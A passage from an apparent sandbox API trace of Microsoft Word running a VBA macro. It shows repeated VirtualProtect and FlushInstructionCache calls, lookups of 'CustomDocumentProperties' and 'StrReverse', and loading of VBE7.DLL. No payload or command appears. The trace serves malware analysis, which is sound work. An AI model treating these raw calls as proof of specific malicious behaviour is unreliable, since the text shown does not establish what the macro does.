lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0093.043] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.044] GetCurrentProcess () returned 0xffffffff [0093.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0093.044] GetCurrentProcess () returned 0xffffffff [0093.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0093.044] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.111] GetCurrentProcess () returned 0xffffffff [0093.111] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0093.111] GetCurrentProcess () returned 0xffffffff [0093.112] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0093.113] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.114] GetCurrentProcess () returned 0xffffffff [0093.114] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0093.114] GetCurrentProcess () returned 0xffffffff [0093.114] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0093.114] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.116] GetCurrentProcess () returned 0xffffffff [0093.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0093.116] GetCurrentProcess () returned 0xffffffff [0093.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0093.116] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.122] GetCurrentProcess () returned 0xffffffff [0093.122] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0093.122] GetCurrentProcess () returned 0xffffffff [0093.122] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0093.122] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.126] GetCurrentProcess () returned 0xffffffff [0093.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0093.128] GetCurrentProcess () returned 0xffffffff [0093.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0093.128] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.132] GetCurrentProcess () returned 0xffffffff [0093.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0093.132] GetCurrentProcess () returned 0xffffffff [0093.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0093.134] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.140] GetCurrentProcess () returned 0xffffffff [0093.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0093.140] GetCurrentProcess () returned 0xffffffff [0093.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0093.142] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.144] GetCurrentProcess () returned 0xffffffff [0093.144] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0093.144] GetCurrentProcess () returned 0xffffffff [0093.145] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0093.145] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.148] GetCurrentProcess () returned 0xffffffff [0093.148] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0093.148] GetCurrentProcess () returned 0xffffffff [0093.150] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0093.150] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.152] GetCurrentProcess () returned 0xffffffff [0093.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0093.152] GetCurrentProcess () returned 0xffffffff [0093.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0093.155] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.157] GetCurrentProcess () returned 0xffffffff [0093.158] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0093.158] GetCurrentProcess () returned 0xffffffff [0093.158] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0093.158] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.159] GetCurrentProcess () returned 0xffffffff [0093.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0093.159] GetCurrentProcess () returned 0xffffffff [0093.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0093.159] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.160] GetCurrentProcess () returned 0xffffffff [0093.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0093.160] GetCurrentProcess () returned 0xffffffff [0093.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0093.160] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.161] GetCurrentProcess () returned 0xffffffff [0093.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0093.161] GetCurrentProcess () returned 0xffffffff [0093.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0093.161] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.162] GetCurrentProcess () returned 0xffffffff [0093.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0093.162] GetCurrentProcess () returned 0xffffffff [0093.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0093.162] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.163] GetCurrentProcess () returned 0xffffffff [0093.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0093.163] GetCurrentProcess () returned 0xffffffff [0093.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0093.163] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.163] GetCurrentProcess () returned 0xffffffff [0093.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0093.164] GetAsyncKeyState (vKey=3) returned 0 [0093.165] CRetailMalloc_Alloc () returned 0xf4b2130 [0093.165] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82cc2, cbMultiByte=15, lpWideCharStr=0x1976a4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0093.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d9a, cbMultiByte=15, lpWideCharStr=0x197704, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0093.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d9a, cbMultiByte=15, lpWideCharStr=0x197704, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0093.174] CRetailMalloc_Alloc () returned 0xc98b9d0 [0093.174] CRetailMalloc_Realloc () returned 0xcd2cbf0 [0093.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d9a, cbMultiByte=15, lpWideCharStr=0x1976c4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0093.175] CRetailMalloc_Realloc () returned 0xc9dcd80 [0093.177] CRetailMalloc_Realloc () returned 0xf4d36e8 [0093.177] memcpy (in: _Dst=0xb2a516c, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.177] CRetailMalloc_Alloc () returned 0xc98bd30 [0093.177] CRetailMalloc_Realloc () returned 0xf73a360 [0093.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a405fe, cbMultiByte=25, lpWideCharStr=0x1976dc, cchWideChar=26 | out: lpWideCharStr="CustomDocumentProperties") returned 25 [0093.178] CRetailMalloc_Realloc () returned 0xf720840 [0093.179] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82cee, cbMultiByte=11, lpWideCharStr=0x1976a4, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0093.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a405d6, cbMultiByte=11, lpWideCharStr=0x197704, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0093.180] CRetailMalloc_Realloc () returned 0xf7238a0 [0093.181] CRetailMalloc_Realloc () returned 0xb3fd878 [0093.181] CRetailMalloc_Realloc () returned 0xf7469a0 [0093.181] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.181] CRetailMalloc_Realloc () returned 0xf4d3d60 [0093.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0093.182] CRetailMalloc_Realloc () returned 0xf4b2940 [0093.182] memcpy (in: _Dst=0xf4b2190, _Src=0x197924, _Size=0x18 | out: _Dst=0xf4b2190) returned 0xf4b2190 [0093.182] CRetailMalloc_Realloc () returned 0xf4b2130 [0093.182] CRetailMalloc_Free () returned 0x1 [0093.183] GetCurrentProcess () returned 0xffffffff [0093.183] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0093.183] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.184] GetCurrentProcess () returned 0xffffffff [0093.184] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0093.184] GetCurrentProcess () returned 0xffffffff [0093.184] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0093.184] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.190] GetCurrentProcess () returned 0xffffffff [0093.190] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0093.190] GetCurrentProcess () returned 0xffffffff [0093.190] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0093.192] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.194] GetCurrentProcess () returned 0xffffffff [0093.194] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0093.195] GetCurrentProcess () returned 0xffffffff [0093.195] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0093.196] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.198] GetCurrentProcess () returned 0xffffffff [0093.198] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0093.198] GetCurrentProcess () returned 0xffffffff [0093.198] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0093.198] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.225] GetCurrentProcess () returned 0xffffffff [0093.225] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0093.225] GetCurrentProcess () returned 0xffffffff [0093.228] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0093.228] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.230] GetCurrentProcess () returned 0xffffffff [0093.230] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0093.230] GetCurrentProcess () returned 0xffffffff [0093.231] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0093.231] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.236] GetCurrentProcess () returned 0xffffffff [0093.236] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0093.238] GetCurrentProcess () returned 0xffffffff [0093.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0093.238] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.240] GetCurrentProcess () returned 0xffffffff [0093.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0093.240] GetCurrentProcess () returned 0xffffffff [0093.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0093.241] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.242] GetCurrentProcess () returned 0xffffffff [0093.242] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0093.242] GetCurrentProcess () returned 0xffffffff [0093.242] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0093.242] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.243] GetCurrentProcess () returned 0xffffffff [0093.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0093.243] GetCurrentProcess () returned 0xffffffff [0093.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0093.243] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.243] GetCurrentProcess () returned 0xffffffff [0093.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0093.243] GetCurrentProcess () returned 0xffffffff [0093.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0093.244] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.244] GetCurrentProcess () returned 0xffffffff [0093.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0093.244] GetCurrentProcess () returned 0xffffffff [0093.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0093.244] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.245] GetCurrentProcess () returned 0xffffffff [0093.245] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0093.245] GetCurrentProcess () returned 0xffffffff [0093.245] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0093.245] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.246] GetCurrentProcess () returned 0xffffffff [0093.246] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0093.246] GetCurrentProcess () returned 0xffffffff [0093.246] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0093.246] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.247] GetCurrentProcess () returned 0xffffffff [0093.247] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0093.247] GetCurrentProcess () returned 0xffffffff [0093.247] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0093.247] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.248] GetCurrentProcess () returned 0xffffffff [0093.248] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0093.248] GetCurrentProcess () returned 0xffffffff [0093.248] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0093.248] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.249] GetCurrentProcess () returned 0xffffffff [0093.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0093.249] GetCurrentProcess () returned 0xffffffff [0093.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0093.249] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.249] GetCurrentProcess () returned 0xffffffff [0093.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0093.249] GetCurrentProcess () returned 0xffffffff [0093.250] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0093.250] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.250] GetCurrentProcess () returned 0xffffffff [0093.250] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0093.250] GetCurrentProcess () returned 0xffffffff [0093.250] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0093.250] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.251] GetCurrentProcess () returned 0xffffffff [0093.251] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0093.251] GetCurrentProcess () returned 0xffffffff [0093.251] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0093.251] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.252] GetCurrentProcess () returned 0xffffffff [0093.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0093.252] GetCurrentProcess () returned 0xffffffff [0093.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0093.252] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.253] GetCurrentProcess () returned 0xffffffff [0093.253] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0093.253] GetCurrentProcess () returned 0xffffffff [0093.253] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0093.253] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.253] GetCurrentProcess () returned 0xffffffff [0093.253] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0093.254] GetCurrentProcess () returned 0xffffffff [0093.254] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0093.254] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.254] GetCurrentProcess () returned 0xffffffff [0093.254] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0093.254] GetCurrentProcess () returned 0xffffffff [0093.254] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0093.254] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.255] GetCurrentProcess () returned 0xffffffff [0093.255] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0093.255] GetCurrentProcess () returned 0xffffffff [0093.255] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0093.255] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.256] GetCurrentProcess () returned 0xffffffff [0093.256] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0093.256] GetCurrentProcess () returned 0xffffffff [0093.256] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0093.256] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.257] GetCurrentProcess () returned 0xffffffff [0093.257] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0093.257] GetCurrentProcess () returned 0xffffffff [0093.257] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0093.257] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.257] GetCurrentProcess () returned 0xffffffff [0093.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0093.258] GetCurrentProcess () returned 0xffffffff [0093.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0093.258] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.258] GetCurrentProcess () returned 0xffffffff [0093.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0093.259] GetCurrentProcess () returned 0xffffffff [0093.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0093.259] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.259] GetCurrentProcess () returned 0xffffffff [0093.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0093.259] GetCurrentProcess () returned 0xffffffff [0093.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0093.259] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0093.260] GetCurrentProcess () returned 0xffffffff [0093.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0093.260] SetErrorMode (uMode=0x8001) returned 0x8001 [0093.260] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0093.260] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0093.261] SetErrorMode (uMode=0x8001) returned 0x8001 [0093.262] GetProcAddress (hModule=0x693e0000, lpProcName=0x2c9) returned 0x695efe55 [0093.263] GetAsyncKeyState (vKey=3) returned 0 [0093.263] GetAsyncKeyState (vKey=3) returned 0 [0093.356] CRetailMalloc_Alloc () returned 0xf4b2c48 [0093.356] memcpy (in: 